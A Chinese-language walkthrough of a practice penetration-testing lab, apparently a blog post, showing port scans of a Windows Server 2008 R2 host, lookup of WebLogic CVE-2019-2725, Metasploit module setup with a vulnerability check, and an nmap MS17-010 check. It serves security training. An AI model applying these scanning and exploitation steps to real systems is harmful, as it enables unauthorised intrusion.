当前位置: 首页 > news >正文

红日靶场二:WebLogic CVE-2019-2725 到域控沦陷全流程

news 2026/6/24 2:27:31

靶场信息

相关注意事项:

二、信息搜集

1、TCP 端口扫描 + 指纹识别 + 操作系统识别

工具:rustscan + nmap

nmap带上-Pn参数,表示不进行主机发现,这是为了避免主机发现失败导致的指纹探测失败。

因为nmap的默认扫描逻辑是这样的:

主机存活探测(ICMP ping / TCP ping) ↓ 没有响应? ↓ 认为主机已下线 → 直接跳过,不扫端口

问题在于,很多主机(尤其是 Windows、有防火墙的服务器)会屏蔽 ICMP,但端口服务完全正常运行。Nmap 误判主机离线,导致你什么都扫不到。

命令:

sudo rustscan -a 192.168.111.80 -r 1-65535 -- -sV -O -Pn -n

输出(由于输出很长,只是截取了关键的部分):

PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 63 Microsoft IIS httpd 7.5 135/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 63 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack ttl 63 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1433/tcp open ms-sql-s syn-ack ttl 63 Microsoft SQL Server 2008 R2 10.50.4000; SP2 3389/tcp open ms-wbt-server? syn-ack ttl 63 7001/tcp open http syn-ack ttl 63 Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled) 49152/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 49153/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 49154/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 49176/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 49194/tcp open msrpc syn-ack ttl 63 Microsoft Windows RPC 60966/tcp open ms-sql-s syn-ack ttl 63 Microsoft SQL Server 2008 R2 10.50.4000; SP2 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (94%) OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Microsoft Windows Server 2008 R2 or Windows 7 SP1 (94%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 SP1 (88%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 or Windows 8.1 (87%) No exact OS matches for host (test conditions non-ideal). TCP/IP fingerprint: SCAN(V=7.98%E=4%D=3/31%OT=80%CT=%CU=%PV=Y%G=N%TM=69CB43AF%P=x86_64-pc-linux-gnu) SEQ(SP=106%GCD=1%ISR=109%TI=I%TS=7) SEQ(SP=109%GCD=1%ISR=108%TI=I%TS=7) OPS(O1=M551NW8ST11%O2=M551NW8ST11%O3=M551NW8NNT11%O4=M551NW8ST11%O5=M551NW8ST11%O6=M551ST11) WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000) ECN(R=Y%DF=Y%TG=40%W=2000%O=M551NW8NNS%CC=N%Q=) T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=) T2(R=N) T3(R=N) T4(R=N) U1(R=N) IE(R=N) Uptime guess: 0.016 days (since Tue Mar 31 11:23:47 2026) TCP Sequence Prediction: Difficulty=265 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Read data files from: /usr/share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 2 IP addresses (2 hosts up) scanned in 181.06 seconds Raw packets sent: 198 (18.984KB) | Rcvd: 60 (3.064KB)

2、UDP 扫描关键端口 + 指纹识别

补一轮 UDP 扫描,以免漏掉关键信息:

工具:Nmap

命令:

sudo nmap -sU --top-ports 20 -sV -Pn -n 192.168.111.80

输出:

Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 11:51 +0800 Nmap scan report for 192.168.111.80 Host is up. PORT STATE SERVICE VERSION 53/udp open|filtered domain 67/udp open|filtered dhcps 68/udp open|filtered dhcpc 69/udp open|filtered tftp 123/udp open|filtered ntp 135/udp open|filtered msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 139/udp open|filtered netbios-ssn 161/udp open|filtered snmp 162/udp open|filtered snmptrap 445/udp open|filtered microsoft-ds 500/udp open|filtered isakmp 514/udp open|filtered syslog 520/udp open|filtered route 631/udp open|filtered ipp 1434/udp open|filtered ms-sql-m 1900/udp open|filtered upnp 4500/udp open|filtered nat-t-ike 49152/udp open|filtered unknown Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 128.47 seconds

3、优先级列表

目标:大概率是一台 Windows Server 2008 R2

架构:几乎可以确认是 x64

端口聚焦:

PORT STATE SERVICE REASON VERSION 7001/tcp open http syn-ack ttl 63 Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)

T3 协议是 WebLogic 的远程对象协议,默认开放,且历史上反复出现反序列化漏洞。

PORT STATE SERVICE REASON VERSION 445/tcp open microsoft-ds syn-ack ttl 63 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

MS17-010 (EternalBlue) 这个漏洞在 2008 R2 上默认存在,直到打补丁为止。

三、漏洞查找与验证

1、CVE-2019-2725

根据指纹信息查找相关的漏洞:

值得注意的是,关键词限制并不是却多越好,有些时候放宽点关键词,能看到更丰富的信息。

查看 CVE 编号:

zyf@kali:~$ searchsploit -x 46780 | head -10 Exploit: Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution URL: https://www.exploit-db.com/exploits/46780 Path: /usr/share/exploitdb/exploits/windows/webapps/46780.py Codes: CVE-2019-2725 Verified: False File Type: Python script, ASCII text executable, with very long lines (6251) #!/usr/bin/python # Exploit Title: Oracle Weblogic Exploit CVE-2019-2725

是 CVE-2019-2725,打开 MSF,通过search命令找对应的模块:

msfconsole

msf > search CVE-2019-2725 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/misc/weblogic_deserialize_asyncresponseservice 2019-04-23 excellent Yes Oracle Weblogic Server Deserialization RCE - AsyncResponseService 1 \_ target: Unix . . . . 2 \_ target: Windows . . . . 3 \_ target: Solaris . . . . Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/misc/weblogic_deserialize_asyncresponseservice After interacting with a module you can manually set a TARGET with set TARGET 'Solaris'

使用模块并验证:

msf > use 0 [*] Using configured payload cmd/unix/reverse_bash msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > info Name: Oracle Weblogic Server Deserialization RCE - AsyncResponseService Module: exploit/multi/misc/weblogic_deserialize_asyncresponseservice Platform: Unix, Windows, Solaris Arch: cmd, x64, x86 Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2019-04-23 Provided by: Andres Rodriguez - 2Secure (@acamro) <acamro@gmail.com> Module side effects: ioc-in-logs Module stability: crash-safe Module reliability: repeatable-session Available targets: Id Name -- ---- => 0 Unix 1 Windows 2 Solaris Check supported: Yes Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sap ni, socks4 RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 7001 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /_async/AsyncResponseService yes URL to AsyncResponseService VHOST no HTTP server virtual host Payload information: Description: An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host. References: https://nvd.nist.gov/vuln/detail/CVE-2019-2725 http://web.archive.org/web/20190508024326/http://www.cnvd.org.cn/webinfo/show/4999 https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html https://twitter.com/F5Labs/status/1120822404568244224 View the full module info with the info -d command. msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set target Windows target => Windows msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set LHOST 192.168.111.44 LHOST => 192.168.111.44 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set RHOST 192.168.111.80 RHOST => 192.168.111.80 msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check [+] 192.168.111.80:7001 - The target is vulnerable.

存在漏洞

2、永恒之蓝

用 Nmap 的 NSE 脚本验证是否存在漏洞:

┌──(zyf㉿kali)-[~/hongr2] └─$ sudo nmap --script=smb-vuln-ms17-010 192.168.111.80 -p 445 -Pn -n Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 15:02 +0800 Nmap scan report for 192.168.111.80 Host is up (0.068s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ Nmap done: 1 IP address (1 host up) scanned in 1.99 seconds

漏洞存在。

http://www.gsyq.cn/news/1581994.html

相关文章:

  • 桑坦德银行向全体员工开放AI工具,首季创造3500万欧元价值
  • 别再问 AMD 显卡能不能跑 AI,SGLang 加 TileLang 组合拳给你答案
  • 中小企业怎么做GEO优化?AI时代低成本长效获客指南
  • HIP 算子兼容性排查,AMD 显卡微调中那些奇怪的报错与解法
  • MateClaw v1.6.0 发布:补齐企业 Agent 工程能力,多方面升级助力生产环境
  • 多派生与多继承演示职读类StuTeech
  • AVR单片机内部温度传感器校准指南:从原理到单点/两点校准实践
  • Windows下载教程 Windows 10 保姆级安装步骤(附镜像文件)系统重装图文详解
  • GLM-5.2 vs GPT-5.5 成本实算:每天 1 万/10 万/100 万次请求的账单差距(2026)
  • 掉发和白发同时出现?高仕星维生素b的双重营养方案
  • 零代码组态开发实操:串口屏项目从数月迭代压缩至数天
  • ATtiny20 8位MCU超低功耗设计实战:从架构解析到物联网终端应用
  • 2026实战:用Gemini镜像站解决Spring Boot微服务性能瓶颈与故障排查
  • AT21CSMK100单线EEPROM开发指南:从1-Wire协议到嵌入式存储实战
  • 挖掘 Github 宝藏,盘点那些好用的 ROCm 开源项目
  • 简单好用,一键搜索全网资源!
  • windows经典漏洞之永恒之蓝
  • 专业的跨境电商合规方案哪个好
  • 基于ATA8510-EK1的Sub-GHz无线传感器网络快速开发实践
  • 1.4 面试:Function Calling(函数调用)
  • ATA5279天线驱动芯片Boost转换器与电流调节环路设计实战指南
  • LLaMA-Factory 原生支持 ROCm 是真的香,配合 HIPify 几分钟完成环境验证
  • Origin 2025 下载Origin2025安装教程——科学绘图与数据分析入门
  • Microchip嵌入式开发资源全攻略:从数据手册到社区支持的高效导航
  • Meilisearch:一个为搜索速度而生的开源引擎
  • 【2026】FreeOK官网入口,一键直达在线观看
  • 2026年GEO信源媒体发稿平台全盘点:三种模式、代表玩家与适用场景
  • 主表 + 扩展表设计模式
  • 从稳压到基准:CD47温度补偿齐纳基准源原理、选型与实战指南
  • ClockStudio图表进阶:双Y轴与高级工具实战指南